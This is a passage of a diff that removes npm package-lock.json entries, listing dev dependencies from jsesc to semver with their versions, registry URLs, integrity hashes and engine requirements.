- }, - "node_modules/jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==", - "dev": true - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", - "dev": true - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", - "dev": true, - "engines": { - "node": ">=12.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dev": true, - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "optional": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "dependencies": { - "semver": "^7.5.3" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-dir/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.49.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", - "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", - "dev": true, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.32", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", - "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", - "dev": true, - "dependencies": { - "mime-db": "1.49.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "3.1.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.1.6.tgz", - "integrity": "sha512-rty5kpw9/z8SX9dmxblFA6edItUmwJgMeYDZRrwlIVN27i8gysGbznJwUggw2V/FVqFSDdWy040ZPS811DYAqQ==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dev": true, - "dependencies": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "dev": true, - "bin": { - "mkdirp": "bin/cmd.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "dev": true, - "engines": { - "node": "*" - } - }, - "node_modules/object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "dev": true, - "optional": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/oidc-token-hash": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.1.tgz", - "integrity": "sha512-EvoOtz6FIEBzE+9q253HsLCVRiK/0doEJ2HCvvqMQb3dHZrP3WlJKYtJ55CRTw4jmYomzH4wkPuCj/I3ZvpKxQ==", - "dev": true, - "optional": true, - "engines": { - "node": "^10.13.0 || >=12.0.0" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "5.4.0", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.0.tgz", - "integrity": "sha512-hgJa2aQKcM2hn3eyVtN12tEA45ECjTJPXCgUh5YzTzy9qwapCvmDTVPWOcWVL0d34zeQoQ/hbG9lJhl3AYxJlQ==", - "dev": true, - "optional": true, - "dependencies": { - "jose": "^4.10.0", - "lru-cache": "^6.0.0", - "object-hash": "^2.0.1", - "oidc-token-hash": "^5.0.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", - "dev": true, - "bin": { - "prettier": "bin/prettier.cjs" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/prettier/prettier?sponsor=1" - } - }, - "node_modules/pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==", - "dev": true - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "dev": true, - "engines": { - "node": ">=0.6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dev": true, - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dev": true, - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "dependencies": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/rfc4648": { - "version": "1.5.1", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.1.tgz", - "integrity": "sha512-60e/YWs2/D3MV1ErdjhJHcmlgnyLUiG4X/14dgsfm9/zmCWLN16xI6YqJYSCd/OANM7bUNzJqPY5B8/02S9Ibw==", - "dev": true - }, - "node_modules/safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==", - "dev": true - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", - "dev": true - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": 